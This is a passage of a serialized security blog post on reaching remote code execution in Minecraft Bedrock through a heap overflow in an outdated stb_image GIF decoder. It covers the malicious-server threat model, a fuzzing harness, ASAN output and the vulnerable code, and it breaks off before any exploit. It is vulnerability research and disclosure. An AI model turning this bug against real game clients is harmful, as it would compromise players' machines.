[{"data":1,"prerenderedAt":162162},["ShallowReactive",2],{"blog-/blog/2026-06-02-minecraft-heap-overflow-to-rce":3,"featured-blog-posts":9706},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"author":11,"image":12,"isFeatured":16,"onBlogPage":16,"tags":17,"body":20,"_type":9700,"_id":9701,"_source":9702,"_file":9703,"_stem":9704,"_extension":9705},"/blog/2026-06-02-minecraft-heap-overflow-to-rce","blog",false,"","Pwning Minecraft: 4-Byte Heap Overflow to RCE","We achieved RCE in Minecraft Bedrock, turning a 4-byte heap overflow into complete client compromise. Learn how a universal, Bedrock-specific technique is used to bypass ASLR and achieve arbitrary read/write primitives.","2026-06-02T12:00:00.000Z","hrvoje",{"src":13,"width":14,"height":15},"/posts/minecraft-heap-overflow-to-rce/title.png",1536,1024,true,[18,19],"minecraft","rce",{"type":21,"children":22,"toc":9677},"root",[23,31,37,42,49,54,74,79,86,91,96,102,107,112,117,123,128,133,139,161,173,182,207,221,228,234,244,264,269,276,290,699,704,712,718,738,1066,1095,1138,1150,1158,1163,1639,1658,1680,2036,2062,2334,2359,2387,2602,2621,2629,2648,2654,2718,2722,2744,2750,2755,2760,2766,2771,2785,2791,2805,2811,2824,2829,2837,2842,2848,2869,2877,2890,2893,2898,2912,2917,2922,2928,2933,2956,2961,2967,2972,2984,2996,3119,3140,3145,3150,3156,3161,3181,3825,3838,4961,4966,4974,4979,4985,4990,4998,5011,5016,5021,5028,5041,5046,5053,5110,5130,5137,5157,5164,5167,5172,5177,5183,5196,5209,5217,5289,5301,5335,5343,5348,5353,5359,5372,5391,5403,5408,5416,5436,5444,5463,5471,5497,5505,5510,5518,5523,5531,5534,5539,5544,5550,5563,5581,5622,5654,5662,5667,5673,5678,5683,5689,5702,5873,5885,5893,5898,5905,5910,5974,6023,6035,6040,6066,6141,6180,6185,6193,6214,6219,6245,6280,6334,6381,6387,6406,6439,6447,6550,6621,6627,6653,6660,6665,6672,6677,6926,6952,6957,7005,7010,7016,7051,7063,7095,7103,7142,7150,7155,7163,7168,7176,7188,7196,7208,7216,7228,7248,7254,7274,7291,7299,7311,7319,7339,7344,7352,7357,7365,7391,7402,7409,7414,7422,7427,7435,7440,7448,7453,7461,7466,7474,7479,7487,7528,7535,7540,7548,7553,7561,7566,7574,7579,7584,7592,7597,7605,7631,7639,7666,7674,7679,7687,7692,7700,7708,7713,7721,7726,7734,7737,7748,7783,7801,7809,7829,7835,7854,7913,7933,7941,7944,7983,8043,8048,8054,8067,8075,8128,8167,8175,8208,8211,8232,8240,8246,8251,8259,8299,8340,8360,8365,8370,8388,8394,8399,8419,8480,8488,8515,8521,8541,8546,8551,8558,8623,8628,8635,8656,8661,8673,8679,8713,8720,8725,8753,8760,8819,8831,8838,8901,8920,8926,8960,8981,9008,9016,9070,9141,9147,9168,9211,9216,9622,9628,9633,9650,9656,9661,9666,9671],{"type":24,"tag":25,"props":26,"children":28},"element","h1",{"id":27},"pwning-minecraft-4-byte-heap-overflow-to-rce",[29],{"type":30,"value":8},"text",{"type":24,"tag":32,"props":33,"children":34},"p",{},[35],{"type":30,"value":36},"In this post, we explore how we achieved remote code execution with a 4-byte heap overflow on a target with default modern protections - working around Windows' Control Flow Guard and ASLR on a remote client connecting to a malicious server, without any information leaks from the client.",{"type":24,"tag":32,"props":38,"children":39},{},[40],{"type":30,"value":41},"We present a powerful technique, specific to our target, which can be used to achieve RCE for bug types such as double frees, use-after-frees, and any heap overflow of at least 3 bytes.",{"type":24,"tag":43,"props":44,"children":46},"h2",{"id":45},"the-target",[47],{"type":30,"value":48},"The Target",{"type":24,"tag":32,"props":50,"children":51},{},[52],{"type":30,"value":53},"Minecraft is one of the most popular games of all time, with millions of daily players and a large count of community servers actively played by thousands - this, and the lack of research in this area made it an intriguing target.",{"type":24,"tag":32,"props":55,"children":56},{},[57,59,65,67,72],{"type":30,"value":58},"There are two main editions: ",{"type":24,"tag":60,"props":61,"children":62},"strong",{},[63],{"type":30,"value":64},"Minecraft Java Edition",{"type":30,"value":66},", written in Java and available on desktop platforms (Windows, macOS, Linux), and ",{"type":24,"tag":60,"props":68,"children":69},{},[70],{"type":30,"value":71},"Minecraft Bedrock Edition",{"type":30,"value":73},", written largely in C++ and used on consoles like PlayStation and Xbox, mobile platforms, and also available on Windows.",{"type":24,"tag":32,"props":75,"children":76},{},[77],{"type":30,"value":78},"Given that we were interested in memory corruption bugs we chose the Bedrock Edition. Specifically, we decided to explore the Windows version as the debugging setup was the one we were most familiar with.",{"type":24,"tag":80,"props":81,"children":83},"h3",{"id":82},"choice-of-context",[84],{"type":30,"value":85},"Choice of Context",{"type":24,"tag":32,"props":87,"children":88},{},[89],{"type":30,"value":90},"We focused on a malicious-server -> connecting-client threat model because a server controls many inputs, giving a larger, easier-to-reach attack surface than client->client attacks.",{"type":24,"tag":32,"props":92,"children":93},{},[94],{"type":30,"value":95},"A server can control a large state which includes: the whole world and all entities within, each connected client state such as the position and view angles, and server-provided resource packs which connecting clients will download and parse.",{"type":24,"tag":80,"props":97,"children":99},{"id":98},"resource-packs",[100],{"type":30,"value":101},"Resource Packs",{"type":24,"tag":32,"props":103,"children":104},{},[105],{"type":30,"value":106},"Resource packs are a way to change the look of Minecraft. They specify custom textures and sounds of blocks and entities, while also controlling client-side entity animations.",{"type":24,"tag":32,"props":108,"children":109},{},[110],{"type":30,"value":111},"A server can provide a custom resource pack to the client upon connecting, which the client can optionally download and load. If the server set the resource pack to mandatory, clients that refuse the resource pack aren't allowed to connect.",{"type":24,"tag":32,"props":113,"children":114},{},[115],{"type":30,"value":116},"This widens the attack surface to include image and audio parsing - both historically common sources of memory-corruption bugs.",{"type":24,"tag":43,"props":118,"children":120},{"id":119},"finding-a-memory-corruption-bug",[121],{"type":30,"value":122},"Finding a Memory Corruption Bug",{"type":24,"tag":32,"props":124,"children":125},{},[126],{"type":30,"value":127},"Given that Minecraft is a large, closed-source C++ codebase, we wanted to avoid unnecessary reverse engineering; therefore we first looked at the image-parsing code.",{"type":24,"tag":32,"props":129,"children":130},{},[131],{"type":30,"value":132},"Image parsing is interesting because programs rarely reimplement decoders, they typically use third-party libraries. We hoped Minecraft used an open-source library we could read, which is much easier than reversing a native decoder.",{"type":24,"tag":80,"props":134,"children":136},{"id":135},"locating-image-parsing-code",[137],{"type":30,"value":138},"Locating Image Parsing Code",{"type":24,"tag":32,"props":140,"children":141},{},[142,144,151,153,159],{"type":30,"value":143},"The simplest way to find code that handles image parsing is to search for expected strings such as ",{"type":24,"tag":145,"props":146,"children":148},"code",{"className":147},[],[149],{"type":30,"value":150},"PNG",{"type":30,"value":152}," or ",{"type":24,"tag":145,"props":154,"children":156},{"className":155},[],[157],{"type":30,"value":158},"GIF",{"type":30,"value":160}," and look for error logging or other messages that use those substrings.",{"type":24,"tag":32,"props":162,"children":163},{},[164,166,171],{"type":30,"value":165},"Searching for the string ",{"type":24,"tag":145,"props":167,"children":169},{"className":168},[],[170],{"type":30,"value":158},{"type":30,"value":172}," returned some interesting results:",{"type":24,"tag":32,"props":174,"children":175},{},[176],{"type":24,"tag":177,"props":178,"children":181},"img",{"alt":179,"src":180},"image","/posts/minecraft-heap-overflow-to-rce/image1.png",[],{"type":24,"tag":32,"props":183,"children":184},{},[185,187,196,198,205],{"type":30,"value":186},"Most - if not all - of these results look like they are used by an image parser. We searched online for the strings and found they match the exact strings used in ",{"type":24,"tag":188,"props":189,"children":193},"a",{"href":190,"rel":191},"https://github.com/nothings/stb/blob/fede005abaf93d9d7f3a679d1999b2db341b360f/stb_image.h",[192],"nofollow",[194],{"type":30,"value":195},"stb_image.h",{"type":30,"value":197},". For an example: usage of ",{"type":24,"tag":188,"props":199,"children":202},{"href":200,"rel":201},"https://github.com/nothings/stb/blob/fede005abaf93d9d7f3a679d1999b2db341b360f/stb_image.h#L6855",[192],[203],{"type":30,"value":204},"bad Image Descriptor",{"type":30,"value":206},".",{"type":24,"tag":32,"props":208,"children":209},{},[210,212,219],{"type":30,"value":211},"To confirm that the library code was actually used to load images, we created a simple resource pack containing a single GIF image, set a breakpoint at ",{"type":24,"tag":188,"props":213,"children":216},{"href":214,"rel":215},"https://github.com/nothings/stb/blob/fede005abaf93d9d7f3a679d1999b2db341b360f/stb_image.h#L6778",[192],[217],{"type":30,"value":218},"stbi__gif_load_next",{"type":30,"value":220},", and loaded the resource pack - this confirmed its usage:",{"type":24,"tag":32,"props":222,"children":223},{},[224],{"type":24,"tag":177,"props":225,"children":227},{"alt":179,"src":226},"/posts/minecraft-heap-overflow-to-rce/image2.png",[],{"type":24,"tag":80,"props":229,"children":231},{"id":230},"stb-image-library",[232],{"type":30,"value":233},"STB Image Library",{"type":24,"tag":32,"props":235,"children":236},{},[237,242],{"type":24,"tag":145,"props":238,"children":240},{"className":239},[],[241],{"type":30,"value":195},{"type":30,"value":243}," had a number of memory corruption bugs historically, but the known ones were fixed in later revisions. Finding a new 0-day in this library looked relatively hard because it’s widely used and has been well-scrutinized at that point.",{"type":24,"tag":32,"props":245,"children":246},{},[247,249,254,256,263],{"type":30,"value":248},"Instead, we checked whether the version used by Minecraft was outdated - if so, previously reported bugs might apply. We inspected ",{"type":24,"tag":145,"props":250,"children":252},{"className":251},[],[253],{"type":30,"value":195},{"type":30,"value":255}," commits and checked whether those changes were present in the Minecraft executable. Eventually, we found that Minecraft was using a fairly old revision - some commit prior to ",{"type":24,"tag":188,"props":257,"children":260},{"href":258,"rel":259},"https://github.com/nothings/stb/commit/f1f077b2722f55e158cba020f0312ee2d13c463a",[192],[261],{"type":30,"value":262},"f1f077b2722f55e158cba020f0312ee2d13c463a",{"type":30,"value":206},{"type":24,"tag":32,"props":265,"children":266},{},[267],{"type":30,"value":268},"At the time, the commit was already 6 years old, while there were public reports for memory corruption bugs after it. We looked through the reported bugs but didn't find an interesting and applicable one, so we decided to run a simple fuzzing harness on this commit.",{"type":24,"tag":270,"props":271,"children":273},"h4",{"id":272},"fuzzing",[274],{"type":30,"value":275},"Fuzzing",{"type":24,"tag":32,"props":277,"children":278},{},[279,281,288],{"type":30,"value":280},"The fuzzer consisted of a very simple ",{"type":24,"tag":188,"props":282,"children":285},{"href":283,"rel":284},"https://github.com/AFLplusplus/AFLplusplus",[192],[286],{"type":30,"value":287},"AFL++",{"type":30,"value":289}," harness:",{"type":24,"tag":291,"props":292,"children":296},"pre",{"code":293,"language":294,"meta":7,"className":295,"style":7},"#define STB_IMAGE_IMPLEMENTATION\n#include \"./stb/stb_image.h\"\n\nint main(int argc, char **argv) {\n int x, y, comp;\n unsigned char *ret;\n\n if (argc != 2) {\n return 1;\n }\n\n ret = stbi_load(argv[1], &x, &y, &comp, 0);\n if (ret == NULL) {\n return 1;\n }\n \n stbi_image_free(ret);\n\n return 0;\n}\n","c","language-c shiki shiki-themes slack-dark",[297],{"type":24,"tag":145,"props":298,"children":299},{"__ignoreMap":7},[300,318,333,342,399,413,437,445,474,493,502,510,590,617,633,641,650,664,672,690],{"type":24,"tag":301,"props":302,"children":305},"span",{"class":303,"line":304},"line",1,[306,312],{"type":24,"tag":301,"props":307,"children":309},{"style":308},"--shiki-default:#C586C0",[310],{"type":30,"value":311},"#define",{"type":24,"tag":301,"props":313,"children":315},{"style":314},"--shiki-default:#DCDCAA",[316],{"type":30,"value":317}," STB_IMAGE_IMPLEMENTATION\n",{"type":24,"tag":301,"props":319,"children":321},{"class":303,"line":320},2,[322,327],{"type":24,"tag":301,"props":323,"children":324},{"style":308},[325],{"type":30,"value":326},"#include",{"type":24,"tag":301,"props":328,"children":330},{"style":329},"--shiki-default:#CE9178",[331],{"type":30,"value":332}," \"./stb/stb_image.h\"\n",{"type":24,"tag":301,"props":334,"children":336},{"class":303,"line":335},3,[337],{"type":24,"tag":301,"props":338,"children":339},{"emptyLinePlaceholder":16},[340],{"type":30,"value":341},"\n",{"type":24,"tag":301,"props":343,"children":345},{"class":303,"line":344},4,[346,352,357,363,367,373,378,383,389,394],{"type":24,"tag":301,"props":347,"children":349},{"style":348},"--shiki-default:#569CD6",[350],{"type":30,"value":351},"int",{"type":24,"tag":301,"props":353,"children":354},{"style":314},[355],{"type":30,"value":356}," main",{"type":24,"tag":301,"props":358,"children":360},{"style":359},"--shiki-default:#E6E6E6",[361],{"type":30,"value":362},"(",{"type":24,"tag":301,"props":364,"children":365},{"style":348},[366],{"type":30,"value":351},{"type":24,"tag":301,"props":368,"children":370},{"style":369},"--shiki-default:#9CDCFE",[371],{"type":30,"value":372}," argc",{"type":24,"tag":301,"props":374,"children":375},{"style":359},[376],{"type":30,"value":377},", ",{"type":24,"tag":301,"props":379,"children":380},{"style":348},[381],{"type":30,"value":382},"char",{"type":24,"tag":301,"props":384,"children":386},{"style":385},"--shiki-default:#D4D4D4",[387],{"type":30,"value":388}," **",{"type":24,"tag":301,"props":390,"children":391},{"style":369},[392],{"type":30,"value":393},"argv",{"type":24,"tag":301,"props":395,"children":396},{"style":359},[397],{"type":30,"value":398},") {\n",{"type":24,"tag":301,"props":400,"children":402},{"class":303,"line":401},5,[403,408],{"type":24,"tag":301,"props":404,"children":405},{"style":348},[406],{"type":30,"value":407}," int",{"type":24,"tag":301,"props":409,"children":410},{"style":359},[411],{"type":30,"value":412}," x, y, comp;\n",{"type":24,"tag":301,"props":414,"children":416},{"class":303,"line":415},6,[417,422,427,432],{"type":24,"tag":301,"props":418,"children":419},{"style":348},[420],{"type":30,"value":421}," unsigned",{"type":24,"tag":301,"props":423,"children":424},{"style":348},[425],{"type":30,"value":426}," char",{"type":24,"tag":301,"props":428,"children":429},{"style":385},[430],{"type":30,"value":431}," *",{"type":24,"tag":301,"props":433,"children":434},{"style":359},[435],{"type":30,"value":436},"ret;\n",{"type":24,"tag":301,"props":438,"children":440},{"class":303,"line":439},7,[441],{"type":24,"tag":301,"props":442,"children":443},{"emptyLinePlaceholder":16},[444],{"type":30,"value":341},{"type":24,"tag":301,"props":446,"children":448},{"class":303,"line":447},8,[449,454,459,464,470],{"type":24,"tag":301,"props":450,"children":451},{"style":308},[452],{"type":30,"value":453}," if",{"type":24,"tag":301,"props":455,"children":456},{"style":359},[457],{"type":30,"value":458}," (argc ",{"type":24,"tag":301,"props":460,"children":461},{"style":385},[462],{"type":30,"value":463},"!=",{"type":24,"tag":301,"props":465,"children":467},{"style":466},"--shiki-default:#B5CEA8",[468],{"type":30,"value":469}," 2",{"type":24,"tag":301,"props":471,"children":472},{"style":359},[473],{"type":30,"value":398},{"type":24,"tag":301,"props":475,"children":477},{"class":303,"line":476},9,[478,483,488],{"type":24,"tag":301,"props":479,"children":480},{"style":308},[481],{"type":30,"value":482}," return",{"type":24,"tag":301,"props":484,"children":485},{"style":466},[486],{"type":30,"value":487}," 1",{"type":24,"tag":301,"props":489,"children":490},{"style":359},[491],{"type":30,"value":492},";\n",{"type":24,"tag":301,"props":494,"children":496},{"class":303,"line":495},10,[497],{"type":24,"tag":301,"props":498,"children":499},{"style":359},[500],{"type":30,"value":501}," }\n",{"type":24,"tag":301,"props":503,"children":505},{"class":303,"line":504},11,[506],{"type":24,"tag":301,"props":507,"children":508},{"emptyLinePlaceholder":16},[509],{"type":30,"value":341},{"type":24,"tag":301,"props":511,"children":513},{"class":303,"line":512},12,[514,519,524,529,533,537,542,547,552,557,562,566,571,575,580,585],{"type":24,"tag":301,"props":515,"children":516},{"style":359},[517],{"type":30,"value":518}," ret ",{"type":24,"tag":301,"props":520,"children":521},{"style":385},[522],{"type":30,"value":523},"=",{"type":24,"tag":301,"props":525,"children":526},{"style":314},[527],{"type":30,"value":528}," stbi_load",{"type":24,"tag":301,"props":530,"children":531},{"style":359},[532],{"type":30,"value":362},{"type":24,"tag":301,"props":534,"children":535},{"style":369},[536],{"type":30,"value":393},{"type":24,"tag":301,"props":538,"children":539},{"style":359},[540],{"type":30,"value":541},"[",{"type":24,"tag":301,"props":543,"children":544},{"style":466},[545],{"type":30,"value":546},"1",{"type":24,"tag":301,"props":548,"children":549},{"style":359},[550],{"type":30,"value":551},"], ",{"type":24,"tag":301,"props":553,"children":554},{"style":385},[555],{"type":30,"value":556},"&",{"type":24,"tag":301,"props":558,"children":559},{"style":359},[560],{"type":30,"value":561},"x, ",{"type":24,"tag":301,"props":563,"children":564},{"style":385},[565],{"type":30,"value":556},{"type":24,"tag":301,"props":567,"children":568},{"style":359},[569],{"type":30,"value":570},"y, ",{"type":24,"tag":301,"props":572,"children":573},{"style":385},[574],{"type":30,"value":556},{"type":24,"tag":301,"props":576,"children":577},{"style":359},[578],{"type":30,"value":579},"comp, ",{"type":24,"tag":301,"props":581,"children":582},{"style":466},[583],{"type":30,"value":584},"0",{"type":24,"tag":301,"props":586,"children":587},{"style":359},[588],{"type":30,"value":589},");\n",{"type":24,"tag":301,"props":591,"children":593},{"class":303,"line":592},13,[594,598,603,608,613],{"type":24,"tag":301,"props":595,"children":596},{"style":308},[597],{"type":30,"value":453},{"type":24,"tag":301,"props":599,"children":600},{"style":359},[601],{"type":30,"value":602}," (ret ",{"type":24,"tag":301,"props":604,"children":605},{"style":385},[606],{"type":30,"value":607},"==",{"type":24,"tag":301,"props":609,"children":610},{"style":348},[611],{"type":30,"value":612}," NULL",{"type":24,"tag":301,"props":614,"children":615},{"style":359},[616],{"type":30,"value":398},{"type":24,"tag":301,"props":618,"children":620},{"class":303,"line":619},14,[621,625,629],{"type":24,"tag":301,"props":622,"children":623},{"style":308},[624],{"type":30,"value":482},{"type":24,"tag":301,"props":626,"children":627},{"style":466},[628],{"type":30,"value":487},{"type":24,"tag":301,"props":630,"children":631},{"style":359},[632],{"type":30,"value":492},{"type":24,"tag":301,"props":634,"children":636},{"class":303,"line":635},15,[637],{"type":24,"tag":301,"props":638,"children":639},{"style":359},[640],{"type":30,"value":501},{"type":24,"tag":301,"props":642,"children":644},{"class":303,"line":643},16,[645],{"type":24,"tag":301,"props":646,"children":647},{"style":359},[648],{"type":30,"value":649}," \n",{"type":24,"tag":301,"props":651,"children":653},{"class":303,"line":652},17,[654,659],{"type":24,"tag":301,"props":655,"children":656},{"style":314},[657],{"type":30,"value":658}," stbi_image_free",{"type":24,"tag":301,"props":660,"children":661},{"style":359},[662],{"type":30,"value":663},"(ret);\n",{"type":24,"tag":301,"props":665,"children":667},{"class":303,"line":666},18,[668],{"type":24,"tag":301,"props":669,"children":670},{"emptyLinePlaceholder":16},[671],{"type":30,"value":341},{"type":24,"tag":301,"props":673,"children":675},{"class":303,"line":674},19,[676,681,686],{"type":24,"tag":301,"props":677,"children":678},{"style":308},[679],{"type":30,"value":680}," return",{"type":24,"tag":301,"props":682,"children":683},{"style":466},[684],{"type":30,"value":685}," 0",{"type":24,"tag":301,"props":687,"children":688},{"style":359},[689],{"type":30,"value":492},{"type":24,"tag":301,"props":691,"children":693},{"class":303,"line":692},20,[694],{"type":24,"tag":301,"props":695,"children":696},{"style":359},[697],{"type":30,"value":698},"}\n",{"type":24,"tag":32,"props":700,"children":701},{},[702],{"type":30,"value":703},"And soon after starting the fuzzer it found an interesting bug:",{"type":24,"tag":291,"props":705,"children":707},{"code":706},"=================================================================\n==1087247==ERROR: AddressSanitizer: heap-buffer-overflow on address ...\nWRITE of size 1 at 0x52d000008800 thread T0\n #0 0x655424309a49 in stbi__out_gif_code stb/stb_image.h:6233\n #1 0x655424309888 in stbi__out_gif_code stb/stb_image.h:6227\n #2 0x655424309888 in stbi__out_gif_code stb/stb_image.h:6227\n [...]\n #19 0x65542430a697 in stbi__process_gif_raster stb/stb_image.h:6326\n #20 0x65542430b936 in stbi__gif_load_next stb/stb_image.h:6443\n #21 0x65542430c90e in stbi__gif_load stb/stb_image.h:6573\n #22 0x6554242fc0d4 in stbi__load_main stb/stb_image.h:989\n #23 0x6554242fc927 in stbi__load_and_postprocess_8bit stb/stb_image.h:1088\n #24 0x6554242fd34f in stbi_load_from_file stb/stb_image.h:1174\n #25 0x6554242fd22c in stbi_load stb/stb_image.h:1164\n [...]\n",[708],{"type":24,"tag":145,"props":709,"children":710},{"__ignoreMap":7},[711],{"type":30,"value":706},{"type":24,"tag":270,"props":713,"children":715},{"id":714},"investigating-the-finding",[716],{"type":30,"value":717},"Investigating the Finding",{"type":24,"tag":32,"props":719,"children":720},{},[721,723,729,731,736],{"type":30,"value":722},"The ASAN output shows that at line ",{"type":24,"tag":145,"props":724,"children":726},{"className":725},[],[727],{"type":30,"value":728},"6233",{"type":30,"value":730}," of ",{"type":24,"tag":145,"props":732,"children":734},{"className":733},[],[735],{"type":30,"value":195},{"type":30,"value":737}," an attempt was made to write a single byte out-of-bounds. Looking at the nearby source:",{"type":24,"tag":291,"props":739,"children":741},{"code":740,"language":294,"meta":7,"className":295,"style":7},"static void stbi__out_gif_code(stbi__gif *g, stbi__uint16 code)\n{\n stbi_uc *p, *c;\n int idx; \n\n [...]\n\n if (g->cur_y >= g->max_y) return;\n\n idx = g->cur_x + g->cur_y; \n p = &g->out[idx];\n g->history[idx / 4] = 1; // OOB write\n",[742],{"type":24,"tag":145,"props":743,"children":744},{"__ignoreMap":7},[745,792,800,826,839,846,854,861,921,928,975,1010],{"type":24,"tag":301,"props":746,"children":747},{"class":303,"line":304},[748,753,758,763,768,773,778,783,787],{"type":24,"tag":301,"props":749,"children":750},{"style":348},[751],{"type":30,"value":752},"static",{"type":24,"tag":301,"props":754,"children":755},{"style":348},[756],{"type":30,"value":757}," void",{"type":24,"tag":301,"props":759,"children":760},{"style":314},[761],{"type":30,"value":762}," stbi__out_gif_code",{"type":24,"tag":301,"props":764,"children":765},{"style":359},[766],{"type":30,"value":767},"(stbi__gif ",{"type":24,"tag":301,"props":769,"children":770},{"style":385},[771],{"type":30,"value":772},"*",{"type":24,"tag":301,"props":774,"children":775},{"style":369},[776],{"type":30,"value":777},"g",{"type":24,"tag":301,"props":779,"children":780},{"style":359},[781],{"type":30,"value":782},", stbi__uint16 ",{"type":24,"tag":301,"props":784,"children":785},{"style":369},[786],{"type":30,"value":145},{"type":24,"tag":301,"props":788,"children":789},{"style":359},[790],{"type":30,"value":791},")\n",{"type":24,"tag":301,"props":793,"children":794},{"class":303,"line":320},[795],{"type":24,"tag":301,"props":796,"children":797},{"style":359},[798],{"type":30,"value":799},"{\n",{"type":24,"tag":301,"props":801,"children":802},{"class":303,"line":335},[803,808,812,817,821],{"type":24,"tag":301,"props":804,"children":805},{"style":359},[806],{"type":30,"value":807}," stbi_uc ",{"type":24,"tag":301,"props":809,"children":810},{"style":385},[811],{"type":30,"value":772},{"type":24,"tag":301,"props":813,"children":814},{"style":359},[815],{"type":30,"value":816},"p, ",{"type":24,"tag":301,"props":818,"children":819},{"style":385},[820],{"type":30,"value":772},{"type":24,"tag":301,"props":822,"children":823},{"style":359},[824],{"type":30,"value":825},"c;\n",{"type":24,"tag":301,"props":827,"children":828},{"class":303,"line":344},[829,834],{"type":24,"tag":301,"props":830,"children":831},{"style":348},[832],{"type":30,"value":833}," int",{"type":24,"tag":301,"props":835,"children":836},{"style":359},[837],{"type":30,"value":838}," idx; \n",{"type":24,"tag":301,"props":840,"children":841},{"class":303,"line":401},[842],{"type":24,"tag":301,"props":843,"children":844},{"emptyLinePlaceholder":16},[845],{"type":30,"value":341},{"type":24,"tag":301,"props":847,"children":848},{"class":303,"line":415},[849],{"type":24,"tag":301,"props":850,"children":851},{"style":359},[852],{"type":30,"value":853}," [...]\n",{"type":24,"tag":301,"props":855,"children":856},{"class":303,"line":439},[857],{"type":24,"tag":301,"props":858,"children":859},{"emptyLinePlaceholder":16},[860],{"type":30,"value":341},{"type":24,"tag":301,"props":862,"children":863},{"class":303,"line":447},[864,869,874,878,883,888,893,898,902,907,912,917],{"type":24,"tag":301,"props":865,"children":866},{"style":308},[867],{"type":30,"value":868}," if",{"type":24,"tag":301,"props":870,"children":871},{"style":359},[872],{"type":30,"value":873}," (",{"type":24,"tag":301,"props":875,"children":876},{"style":369},[877],{"type":30,"value":777},{"type":24,"tag":301,"props":879,"children":880},{"style":359},[881],{"type":30,"value":882},"->",{"type":24,"tag":301,"props":884,"children":885},{"style":369},[886],{"type":30,"value":887},"cur_y",{"type":24,"tag":301,"props":889,"children":890},{"style":385},[891],{"type":30,"value":892}," >=",{"type":24,"tag":301,"props":894,"children":895},{"style":369},[896],{"type":30,"value":897}," g",{"type":24,"tag":301,"props":899,"children":900},{"style":359},[901],{"type":30,"value":882},{"type":24,"tag":301,"props":903,"children":904},{"style":369},[905],{"type":30,"value":906},"max_y",{"type":24,"tag":301,"props":908,"children":909},{"style":359},[910],{"type":30,"value":911},") ",{"type":24,"tag":301,"props":913,"children":914},{"style":308},[915],{"type":30,"value":916},"return",{"type":24,"tag":301,"props":918,"children":919},{"style":359},[920],{"type":30,"value":492},{"type":24,"tag":301,"props":922,"children":923},{"class":303,"line":476},[924],{"type":24,"tag":301,"props":925,"children":926},{"emptyLinePlaceholder":16},[927],{"type":30,"value":341},{"type":24,"tag":301,"props":929,"children":930},{"class":303,"line":495},[931,936,940,944,948,953,958,962,966,970],{"type":24,"tag":301,"props":932,"children":933},{"style":359},[934],{"type":30,"value":935}," idx ",{"type":24,"tag":301,"props":937,"children":938},{"style":385},[939],{"type":30,"value":523},{"type":24,"tag":301,"props":941,"children":942},{"style":369},[943],{"type":30,"value":897},{"type":24,"tag":301,"props":945,"children":946},{"style":359},[947],{"type":30,"value":882},{"type":24,"tag":301,"props":949,"children":950},{"style":369},[951],{"type":30,"value":952},"cur_x",{"type":24,"tag":301,"props":954,"children":955},{"style":385},[956],{"type":30,"value":957}," +",{"type":24,"tag":301,"props":959,"children":960},{"style":369},[961],{"type":30,"value":897},{"type":24,"tag":301,"props":963,"children":964},{"style":359},[965],{"type":30,"value":882},{"type":24,"tag":301,"props":967,"children":968},{"style":369},[969],{"type":30,"value":887},{"type":24,"tag":301,"props":971,"children":972},{"style":359},[973],{"type":30,"value":974},"; \n",{"type":24,"tag":301,"props":976,"children":977},{"class":303,"line":504},[978,983,987,992,996,1000,1005],{"type":24,"tag":301,"props":979,"children":980},{"style":359},[981],{"type":30,"value":982}," p ",{"type":24,"tag":301,"props":984,"children":985},{"style":385},[986],{"type":30,"value":523},{"type":24,"tag":301,"props":988,"children":989},{"style":385},[990],{"type":30,"value":991}," &",{"type":24,"tag":301,"props":993,"children":994},{"style":369},[995],{"type":30,"value":777},{"type":24,"tag":301,"props":997,"children":998},{"style":359},[999],{"type":30,"value":882},{"type":24,"tag":301,"props":1001,"children":1002},{"style":369},[1003],{"type":30,"value":1004},"out",{"type":24,"tag":301,"props":1006,"children":1007},{"style":359},[1008],{"type":30,"value":1009},"[idx];\n",{"type":24,"tag":301,"props":1011,"children":1012},{"class":303,"line":512},[1013,1018,1022,1027,1032,1037,1042,1047,1051,1055,1060],{"type":24,"tag":301,"props":1014,"children":1015},{"style":369},[1016],{"type":30,"value":1017}," g",{"type":24,"tag":301,"props":1019,"children":1020},{"style":359},[1021],{"type":30,"value":882},{"type":24,"tag":301,"props":1023,"children":1024},{"style":369},[1025],{"type":30,"value":1026},"history",{"type":24,"tag":301,"props":1028,"children":1029},{"style":359},[1030],{"type":30,"value":1031},"[idx ",{"type":24,"tag":301,"props":1033,"children":1034},{"style":385},[1035],{"type":30,"value":1036},"/",{"type":24,"tag":301,"props":1038,"children":1039},{"style":466},[1040],{"type":30,"value":1041}," 4",{"type":24,"tag":301,"props":1043,"children":1044},{"style":359},[1045],{"type":30,"value":1046},"] ",{"type":24,"tag":301,"props":1048,"children":1049},{"style":385},[1050],{"type":30,"value":523},{"type":24,"tag":301,"props":1052,"children":1053},{"style":466},[1054],{"type":30,"value":487},{"type":24,"tag":301,"props":1056,"children":1057},{"style":359},[1058],{"type":30,"value":1059},";",{"type":24,"tag":301,"props":1061,"children":1063},{"style":1062},"--shiki-default:#6A9955",[1064],{"type":30,"value":1065}," // OOB write\n",{"type":24,"tag":32,"props":1067,"children":1068},{},[1069,1071,1077,1079,1085,1087,1093],{"type":30,"value":1070},"It’s reasonable to assume ",{"type":24,"tag":145,"props":1072,"children":1074},{"className":1073},[],[1075],{"type":30,"value":1076},"idx",{"type":30,"value":1078}," is outside the bounds of ",{"type":24,"tag":145,"props":1080,"children":1082},{"className":1081},[],[1083],{"type":30,"value":1084},"g->history",{"type":30,"value":1086},", which leads to a one-byte OOB write (",{"type":24,"tag":145,"props":1088,"children":1090},{"className":1089},[],[1091],{"type":30,"value":1092},"g->history[idx / 4] = 1",{"type":30,"value":1094},"). That single-byte OOB is hard to exploit remotely, but it was the only corruption observed initially, so we investigated further.",{"type":24,"tag":32,"props":1096,"children":1097},{},[1098,1100,1105,1107,1113,1115,1120,1122,1128,1130,1136],{"type":30,"value":1099},"Because ",{"type":24,"tag":145,"props":1101,"children":1103},{"className":1102},[],[1104],{"type":30,"value":32},{"type":30,"value":1106}," is computed from ",{"type":24,"tag":145,"props":1108,"children":1110},{"className":1109},[],[1111],{"type":30,"value":1112},"g->out[idx]",{"type":30,"value":1114}," immediately before the violation, we considered whether ",{"type":24,"tag":145,"props":1116,"children":1118},{"className":1117},[],[1119],{"type":30,"value":1076},{"type":30,"value":1121}," could also be OOB for ",{"type":24,"tag":145,"props":1123,"children":1125},{"className":1124},[],[1126],{"type":30,"value":1127},"g->out",{"type":30,"value":1129},". Note that computing the address ",{"type":24,"tag":145,"props":1131,"children":1133},{"className":1132},[],[1134],{"type":30,"value":1135},"&g->out[idx]",{"type":30,"value":1137}," does not itself access the memory, so ASAN wouldn’t flag it.",{"type":24,"tag":32,"props":1139,"children":1140},{},[1141,1143,1148],{"type":30,"value":1142},"If we comment out ",{"type":24,"tag":145,"props":1144,"children":1146},{"className":1145},[],[1147],{"type":30,"value":1092},{"type":30,"value":1149}," and re-run the 